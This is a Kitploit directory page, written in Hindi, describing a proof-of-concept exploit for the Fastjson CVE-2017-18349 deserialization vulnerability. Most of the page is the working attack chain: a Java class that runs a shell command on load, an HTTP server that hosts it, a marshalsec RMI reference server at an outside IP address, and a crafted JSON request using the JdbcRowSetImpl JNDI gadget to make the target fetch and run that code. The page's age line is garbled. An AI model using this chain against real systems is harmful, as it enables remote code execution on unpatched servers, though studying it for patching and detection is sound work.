Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Fastjson--CVE-2017-18349- — Fastjson CVE-2017-18349 डिसेरियलाइज़ेशन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो तैयार किए गए JSON पेलोड और RMI सर्वर के माध्यम से रिमोट कोड निष्पादन का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/h0cksr/fastjson--cve-2017-18349-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubh0cksr/fastjson--cve-2017-18349-

Fastjson--CVE-2017-18349-

Fastjson CVE-2017-18349 डिसेरियलाइज़ेशन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो तैयार किए गए JSON पेलोड और RMI सर्वर के माध्यम से रिमोट कोड निष्पादन का प्रदर्शन करता है।

रिपॉजिटरी देखें
224 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Fastjson--CVE-2017-18349-Cancel changes

प्रोजेक्ट को Maven प्रोजेक्ट के रूप में सेट करने के बाद निष्पादित करें (ध्यान दें: उच्च संस्करण के JDK का उपयोग करने पर विफलता हो सकती है, JDK संस्करण 1.8.65 का उपयोग करने की अनुशंसा की जाती है) FastjsondemoApplication.java का main फ़ंक्शन ही पर्याप्त है TouchFile.java फ़ाइल

root@kitploit:~
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
  static {
      try {
          Runtime rt = Runtime.getRuntime();
          String[] commands = {"touch", "/tmp/flag_test"};
          Process pc = rt.exec(commands);
          pc.waitFor();
      } catch (Exception e) {
          // do nothing
      }
  }
}

उसके बाद, संस्करण 8 के javac का उपयोग करके .class फ़ाइल में संकलित करें

root@kitploit:~
javac TouchFile.java

Python वेब सेवा शुरू करें

root@kitploit:~
python -m SimpleHTTPServer 80

मार्शलसेक का उपयोग करके RMIServer जनरेट करें

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://47.99.70.18/#TouchFile" 9999

अनुरोध पैकेट संशोधित करें

root@kitploit:~
POST / HTTP/1.1
Host: 127.0.0.1:8080

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://47.99.70.18:9999/TouchFile",
        "autoCommit":true
    }
}

प्रभाव: चित्र

टूल डाउनलोड करें